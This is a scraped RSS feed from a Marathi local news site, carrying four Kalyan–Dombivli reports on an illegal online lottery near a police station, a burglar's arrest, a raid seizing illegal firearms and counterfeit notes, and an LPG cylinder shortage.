डोंबिवली शहरात पोलिसांच्या नाकाखाली टीचुन ऑनलाईन लॉटरीचा बेकायदेशीर बाजार. https://crimeaala.com/?p=8716&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25a1%25e0%25a5%258b%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b2%25e0%25a5%2580-%25e0%25a4%25b6%25e0%25a4%25b9%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a4%25bf%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%259a%25e0%25a5%258d https://crimeaala.com/?p=8716#respond Tue, 07 Apr 2026 12:18:52 +0000 https://crimeaala.com/?p=8716 डोंबिवली :डोंबिवली परिसरात पोलीस स्टेशनच्या अगदी जवळपास ऑनलाईन लॉटरीचा बेकायदेशीर व्यवसाय सर्रास सुरू असल्याचे धक्कादायक चित्र समोर आले आहे. विशेष म्हणजे, या प्रकाराबाबत  अनेक वेळा लेखी तक्रारी व अर्ज करूनही परिस्थिती ‘जैसे थे’ असल्याने पोलिसांच्या कार्यक्षमतेवर प्रश्नचिन्ह निर्माण झाले आहे. नागरिकांच्या म्हणण्यानुसार, खुलेआम सुरू असलेल्या या लॉटरी अड्ड्यांमुळे तरुण वर्ग आणि सर्वसामान्य नागरिक आर्थिक नुकसानाच्या [...]

The post डोंबिवली शहरात पोलिसांच्या नाकाखाली टीचुन ऑनलाईन लॉटरीचा बेकायदेशीर बाजार. first appeared on crimeaala.com.

]]>

डोंबिवली :डोंबिवली परिसरात पोलीस स्टेशनच्या अगदी जवळपास ऑनलाईन लॉटरीचा बेकायदेशीर व्यवसाय सर्रास सुरू असल्याचे धक्कादायक चित्र समोर आले आहे. विशेष म्हणजे, या प्रकाराबाबत  अनेक वेळा लेखी तक्रारी व अर्ज करूनही परिस्थिती ‘जैसे थे’ असल्याने पोलिसांच्या कार्यक्षमतेवर प्रश्नचिन्ह निर्माण झाले आहे.

नागरिकांच्या म्हणण्यानुसार, खुलेआम सुरू असलेल्या या लॉटरी अड्ड्यांमुळे तरुण वर्ग आणि सर्वसामान्य नागरिक आर्थिक नुकसानाच्या जाळ्यात अडकत आहेत. पोलीस स्टेशनच्या हाकेच्या अंतरावरच हा व्यवसाय चालू असताना पोलिसांना याची माहिती नाही का, असा संतप्त सवाल नागरिक उपस्थित करत आहेत.

अनेक वेळा निवेदन देऊनही कोणतीही ठोस कारवाई होत नसल्याने “पोलिसांचा धाक राहिला नाही” अशी भावना परिसरात पसरली आहे. संबंधित अधिकाऱ्यांकडून केवळ आश्वासने मिळत असून प्रत्यक्षात कारवाईचा अभाव दिसून येत आहे

“कायद्याचे रक्षण करणाऱ्यांच्याच सावलीत बेकायदेशीर धंदे फोफावत असतील, तर सामान्य नागरिकांनी न्याय कुणाकडे मागायचा?”

The post डोंबिवली शहरात पोलिसांच्या नाकाखाली टीचुन ऑनलाईन लॉटरीचा बेकायदेशीर बाजार. first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8716 0
उल्हासनगरातून घरफोडी करणारा सराईत चोर जेरबंद; मानपाडा पोलिसांची मोठी कारवाई https://crimeaala.com/?p=8712&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2589%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25b9%25e0%25a4%25be%25e0%25a4%25b8%25e0%25a4%25a8%25e0%25a4%2597%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a4%25e0%25a5%2582%25e0%25a4%25a8-%25e0%25a4%2598%25e0%25a4%25b0%25e0%25a4%25ab%25e0%25a5%258b%25e0%25a4%25a1%25e0%25a5%2580-%25e0%25a4%2595%25e0%25a4%25b0%25e0%25a4%25a3 https://crimeaala.com/?p=8712#respond Thu, 02 Apr 2026 17:38:29 +0000 https://crimeaala.com/?p=8712 कल्याण (प्रतिनिधी ): कल्याण-डोंबिवली परिसरात घरफोडीच्या घटनांनी नागरिकांमध्ये भीतीचे वातावरण निर्माण झाले असताना मानपाडा पोलिसांनी मोठी कामगिरी करत सराईत घरफोड्या करणाऱ्या आरोपीला उल्हासनगर येथून अटक केली आहे. या आरोपीकडून लाखो रुपयांचा मुद्देमाल जप्त करण्यात आला आहे. फिर्यादी . मोमीन उमर शेख (वय ५९, व्यवसाय – हॉटेल) यांनी दिलेल्या तक्रारीनुसार, त्यांनी आपले हॉटेल बंद करून घरी [...]

The post उल्हासनगरातून घरफोडी करणारा सराईत चोर जेरबंद; मानपाडा पोलिसांची मोठी कारवाई first appeared on crimeaala.com.

]]>

कल्याण (प्रतिनिधी ): कल्याण-डोंबिवली परिसरात घरफोडीच्या घटनांनी नागरिकांमध्ये भीतीचे वातावरण निर्माण झाले असताना मानपाडा पोलिसांनी मोठी कामगिरी करत सराईत घरफोड्या करणाऱ्या आरोपीला उल्हासनगर येथून अटक केली आहे. या आरोपीकडून लाखो रुपयांचा मुद्देमाल जप्त करण्यात आला आहे.

फिर्यादी . मोमीन उमर शेख (वय ५९, व्यवसाय – हॉटेल) यांनी दिलेल्या तक्रारीनुसार, त्यांनी आपले हॉटेल बंद करून घरी गेल्यानंतर २१ मार्च ते २२ मार्च २०२६ दरम्यान रात्री अज्ञात आरोपींनी हॉटेलचे शटर वाकवून लॉकरमधील रोख रक्कम व दोन मोबाईल फोन चोरी केले होते. याप्रकरणी मानपाडा पोलीस ठाण्यात गुन्हा क्रमांक २६१/२०२६ भारतीय न्याय संहिता २०२३ च्या कलम ३०५, ३३१(४), ३(५) अंतर्गत गुन्हा दाखल करण्यात आला होता.

गुन्ह्याचा तपास करताना पोलिसांनी घटनास्थळ ते उल्हासनगर येथील राहुलनगरपर्यंत तब्बल ९५ सीसीटीव्ही कॅमेऱ्यांची तपासणी केली. तांत्रिक विश्लेषण व गुप्त माहितीच्या आधारे २९ मार्च २०२६ रोजी चक्कीनाका परिसरात सापळा रचून आरोपी अनिल संजु रूपवते (वय २० वर्षे) याला अटक करण्यात आली.

तपासादरम्यान आरोपीने आपल्या साथीदार संजु किसन वाघरी याच्यासोबत घरफोडीचे गुन्हे केल्याची कबुली दिली. पुढील चौकशीत आरोपीने कल्याण, डोंबिवली व अंबरनाथ परिसरातील एकूण ७ घरफोडीचे गुन्हे केल्याचेही उघड झाले आहे.

पोलिसांनी आरोपीकडून सुमारे २,०८,००० रुपये किंमतीचे १२ मोबाईल फोन, एक पांढऱ्या रंगाची अॅक्टिव्हा दुचाकी व रोख रक्कम असा मुद्देमाल जप्त केला आहे. आरोपीस ०२ एप्रिल २०२६ पर्यंत पोलीस कोठडी सुनावण्यात आली असून पुढील तपास सुरू आहे.

उघडकीस आलेले गुन्हे:
मानपाडा, महात्मा फुले चौक, हिललाईन, कोळशेवाडी, टिळकनगर व डोंबिवली पोलीस ठाण्यातील एकूण ७ गुन्ह्यांचा उलगडा करण्यात आला आहे.

सदरची कामगिरी  संजय जाधव, अपर पोलीस आयुक्त, पुर्व प्रादेशिक विभाग कल्याण,  अतुल झेंडे, पोलीस उप आयुक्त, परिमंडळ ३, कल्याण व  सुहास हेमाडे सहाय्यक पोलीस आयुक्त, डोंबिवली विभाग यांच्या मार्गदर्शनाखाली  संदिपान शिंदे वपोनि, मानपाडा पोलीस ठाणे यांच्या देखरेखीखाली  जयपालसिंह रजपुत पोनि (गुन्हे), सपोनि. सागर चव्हाण, सपोउपनिरी. सुनिल पवार, पोहवा / सुशांत पाटील, पोहवा./संजु मासाळ, पोहवा./विकास माळी, पोहवा./शिरीष पाटील, पोना/केशव भोये, पोशि/योगेश आडे, पोशि/महेश झांजुर्णे, पोशि. अशोक आहेर, पोशि./विजय आव्हाड, पोशि. / सोपान शेळके यांचे पथकाने केलेली आहे.

The post उल्हासनगरातून घरफोडी करणारा सराईत चोर जेरबंद; मानपाडा पोलिसांची मोठी कारवाई first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8712 0
गुन्हे शाखेची मोठी कारवाई; अवैध शस्त्रसाठा व बनावट नोटांसह सराईत गुन्हेगार अटकेत https://crimeaala.com/?p=8707&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2597%25e0%25a5%2581%25e0%25a4%25a8%25e0%25a5%258d%25e0%25a4%25b9%25e0%25a5%2587-%25e0%25a4%25b6%25e0%25a4%25be%25e0%25a4%2596%25e0%25a5%2587%25e0%25a4%259a%25e0%25a5%2580-%25e0%25a4%25ae%25e0%25a5%258b%25e0%25a4%25a0%25e0%25a5%2580-%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a4%25b5%25e0%25a4%25be https://crimeaala.com/?p=8707#respond Wed, 01 Apr 2026 13:03:52 +0000 https://crimeaala.com/?p=8707 डोंबिवली : कल्याण गुन्हे शाखा युनिट-३ ने केलेल्या धडक कारवाईत अवैध अग्निशस्त्रांचा मोठा साठा व लाखोंच्या बनावट नोटा जप्त करत एका सराईत गुन्हेगारास अटक केली आहे. या कारवाईमुळे परिसरात खळबळ उडाली असून पोलिसांच्या दक्षतेचे कौतुक केले जात आहे. पोलिसांकडून मिळालेल्या माहितीनुसार, गुन्हे शाखा युनिट-३ कल्याणकडून अवैध शस्त्र बाळगणाऱ्या गुन्हेगारांवर विशेष मोहीम राबविण्यात येत आहे. त्याच [...]

The post गुन्हे शाखेची मोठी कारवाई; अवैध शस्त्रसाठा व बनावट नोटांसह सराईत गुन्हेगार अटकेत first appeared on crimeaala.com.

]]>

डोंबिवली : कल्याण गुन्हे शाखा युनिट-३ ने केलेल्या धडक कारवाईत अवैध अग्निशस्त्रांचा मोठा साठा व लाखोंच्या बनावट नोटा जप्त करत एका सराईत गुन्हेगारास अटक केली आहे. या कारवाईमुळे परिसरात खळबळ उडाली असून पोलिसांच्या दक्षतेचे कौतुक केले जात आहे.

पोलिसांकडून मिळालेल्या माहितीनुसार, गुन्हे शाखा युनिट-३ कल्याणकडून अवैध शस्त्र बाळगणाऱ्या गुन्हेगारांवर विशेष मोहीम राबविण्यात येत आहे. त्याच अनुषंगाने रेकॉर्डवरील गुन्हेगारांवर बारकाईने लक्ष ठेवले जात असताना सहायक पोलीस निरीक्षक सर्जेराव पाटील यांना गोपनीय माहिती मिळाली. त्यानुसार डोंबिवली पूर्व येथील दावडी परिसरात राहणारा सुरेंद्र पांडुरंग पाटील (वय ५५) हा अवैध शस्त्रसाठा बाळगून असल्याची खात्री पटली.

या माहितीच्या आधारे पोलिसांनी सापळा रचून संबंधित आरोपीस ताब्यात घेतले. त्यानंतर त्याच्या राहत्या घरावर टाकलेल्या छाप्यात धक्कादायक बाब समोर आली. घरातील टेरेसवर गुप्त कप्पा तयार करून त्यामध्ये मोठ्या प्रमाणात शस्त्रे व दारुगोळा लपवून ठेवण्यात आला होता.

या छाप्यात पोलिसांनी ३ देशी बनावटीचे पिस्टल, १ सिक्सर रिव्हॉल्वर, ७ गावठी कट्टे, १ रिकामी मॅगझिन, २ एअर गन, ४०५ जिवंत काडतुसे, १६७ छरे, २ धारदार तलवारी, ३ कोयते, १ धारदार सुरा, १ बटन चाकू, २ लोखंडी रॉड तसेच २ मोबाईल फोन असा मोठा साठा जप्त केला. यासोबतच ३ लाख ५२ हजार रुपयांच्या जुन्या व नवीन बनावट नोटाही हस्तगत करण्यात आल्या. जप्त केलेल्या मुद्देमालाची एकूण किंमत सुमारे १२ लाख २१ हजार रुपये इतकी आहे.
या प्रकरणी मानपाडा पोलीस ठाण्यात भारतीय शस्त्र कायदा कलम ३, ४, २५ तसेच महाराष्ट्र पोलीस अधिनियम कलम ३७ (१) १३५ अंतर्गत गुन्हा दाखल करण्यात आला आहे. आरोपीस अटक करण्यात आली असून तो सध्या पोलीस कोठडीत आहे. पुढील तपास सहायक पोलीस निरीक्षक सर्जेराव पाटील करत आहेत.

दरम्यान, अटक करण्यात आलेला सुरेंद्र पाटील हा रेकॉर्डवरील सराईत गुन्हेगार असून त्याच्यावर यापूर्वी अपहरण, घरफोडी, मारहाण, धमकी, शस्त्र बाळगणे आदी गंभीर स्वरूपाचे अनेक गुन्हे विविध पोलीस ठाण्यांत दाखल आहेत. त्यामुळे त्याच्या अटकेमुळे परिसरात दिलासा व्यक्त केला जात आहे.

ही कारवाई आशुतोष डुंबरे साो, पोलीस आयुक्त, ठाणे शहर, पंजाबराव उगले, अपर पोलीस आयुक्त, गुन्हे, ठाणे शहर,  अमरसिंह जाधव, पोलीस उप आयुक्त, गुन्हे, ठाणे शहर व शेखर बागडे, सहायक पोलीस आयुक्त, शोध-१, गुन्हे शाखा, ठाणे शहर यांच्या मार्गदर्शनाखाली कल्याण गुन्हे शाखेचे वरिष्ठ पोलीस निरीक्षक अजित शिंदे, सहा.पो.निरी. सर्जेराव पाटील, सहा.पो.निरी. बळवंत भराडे, पोउपनिरी किरण भिसे, सपोउपनिरी दत्ताराम भोसले, सहा.पो.उप निरी. बालाजी शिंदे, पोहवा/विजय जिरे, पोहवा पांडुरंग भांगरे, पोहवा/सुधीर कदम, पोहवा/सचिन भालेराव, पोहवा/विलास कडु, पोहवा/सचिन कदम, पोहवा/आदिक जाधव, पोहवा/गोरक्षनाथ पोटे, पोहवा/प्रशांत वानखेडे, पोहवा/उल्हास खंडारे, पोना/दिपक महाजन पोना/प्रविण किनरे, पोशि/गुरूनाथ जरग, पोशि/मिथुन राठोड, पोशि/विनोद चन्ने, पोशि/गणेश हरणे, पोशि/गोरक्ष शेकडे, पोशि/जालिदंर साळुंखे पोशि/सतिश सोनावणे व म.पो.शि./ मंगल गावित चालक पोहवा/सपोउपनि बोरकर, सर्व नेम. गुन्हे शाखा, घटक-३, कल्याण यांनी केलेली आहे.

The post गुन्हे शाखेची मोठी कारवाई; अवैध शस्त्रसाठा व बनावट नोटांसह सराईत गुन्हेगार अटकेत first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8707 0
कल्याणमध्ये एलपीजी गॅस टंचाईवर संताप; तहसीलदारांकडे तातडीच्या उपाययोजनांची मागणी https://crimeaala.com/?p=8703&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a4%25ae%25e0%25a4%25a7%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2587-%25e0%25a4%258f%25e0%25a4%25b2%25e0%25a4%25aa%25e0%25a5%2580%25e0%25a4%259c%25e0%25a5%2580-%25e0%25a4%2597%25e0%25a5%2585%25e0%25a4%25b8-%25e0%25a4%259f https://crimeaala.com/?p=8703#respond Tue, 31 Mar 2026 05:46:06 +0000 https://crimeaala.com/?p=8703 कल्याण (प्रतिनिधी):कल्याण शहरात निर्माण झालेल्या एलपीजी गॅस टंचाईच्या पार्श्वभूमीवर नागरिकांच्या अडचणी गंभीर बनल्या असून याबाबत तातडीने उपाययोजना कराव्यात, अशी मागणी महाराष्ट्र राज्य सचिव वल्ली राजन यांनी तहसीलदार कार्यालय, कल्याण येथे निवेदनाद्वारे केली आहे. शहरात गेल्या काही दिवसांपासून गॅस सिलेंडरच्या कमतरतेमुळे नागरिकांना मोठ्या गैरसोयींचा सामना करावा लागत आहे. अनेक ग्राहकांनी बुकिंग करूनही वेळेत सिलेंडर मिळत नसल्याच्या [...]

The post कल्याणमध्ये एलपीजी गॅस टंचाईवर संताप; तहसीलदारांकडे तातडीच्या उपाययोजनांची मागणी first appeared on crimeaala.com.

]]>

कल्याण (प्रतिनिधी):कल्याण शहरात निर्माण झालेल्या एलपीजी गॅस टंचाईच्या पार्श्वभूमीवर नागरिकांच्या अडचणी गंभीर बनल्या असून याबाबत तातडीने उपाययोजना कराव्यात, अशी मागणी महाराष्ट्र राज्य सचिव वल्ली राजन यांनी तहसीलदार कार्यालय, कल्याण येथे निवेदनाद्वारे केली आहे.

शहरात गेल्या काही दिवसांपासून गॅस सिलेंडरच्या कमतरतेमुळे नागरिकांना मोठ्या गैरसोयींचा सामना करावा लागत आहे. अनेक ग्राहकांनी बुकिंग करूनही वेळेत सिलेंडर मिळत नसल्याच्या तक्रारी वाढत आहेत. काही ठिकाणी काळाबाजार, जादा पैसे आकारणी आणि जाणीवपूर्वक विलंब केल्याच्या घटनाही समोर येत असल्याने नागरिकांमध्ये संतापाची भावना निर्माण झाली आहे.

या पार्श्वभूमीवर सर्व गॅस एजन्सींनी सामाजिक जबाबदारी पार पाडत ग्राहकांना योग्य सेवा द्यावी, असे आवाहन वल्ली राजन यांनी केले. बुकिंगनुसार वेळेत गॅस वितरण करणे, शासनाने निश्चित केलेल्या दरांनुसारच होम डिलिव्हरी करणे आणि कोणत्याही प्रकारचा गैरप्रकार टाळणे आवश्यक असल्याचे त्यांनी स्पष्ट केले.

तसेच प्रशासनाकडे खालील मागण्या करण्यात आल्या आहेत:
१)बुकिंगनंतर निश्चित कालावधीत गॅस सिलेंडरचा पुरवठा करावा.
२)होम डिलिव्हरीसाठी ठरवलेल्या दरापेक्षा जास्त पैसे घेऊ नयेत
३)कृत्रिम टंचाई निर्माण होणार नाही याची खबरदारी घ्यावी

४)सर्वसामान्य नागरिकांना प्राधान्याने गॅस उपलब्ध करून द्यावा

या सूचनांचे पालन न झाल्यास संबंधित गॅस एजन्सींविरोधात तक्रार करून कठोर कारवाईची मागणी करण्यात येईल, असा इशाराही देण्यात आला आहे.
सद्यस्थितीची गंभीरता लक्षात घेता प्रशासनाने तातडीने हस्तक्षेप करून नागरिकांची गैरसोय दूर करावी, अशी ठाम मागणी वल्ली राजन यांनी व्यक्त केली.

यावेळी राष्ट्रवादी काँग्रेस पार्टीचे विविध पदाधिकारी व कार्यकर्ते उपस्थित होते. त्यामध्ये कल्याण जिल्हाध्यक्ष दिनेश परदेशी, अल्पसंख्याक विभागाचे प्रभारी अध्यक्ष रमजान भाई अन्सारी, सरचिटणीस संतोष सरस्वती बळीराम पाटील, असंघटित कामगार विभाग जिल्हाध्यक्ष गोरख भिवा शिंदे तसेच समाजसेवक तोषेश शुक्ला यांचा समावेश होता.

The post कल्याणमध्ये एलपीजी गॅस टंचाईवर संताप; तहसीलदारांकडे तातडीच्या उपाययोजनांची मागणी first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8703 0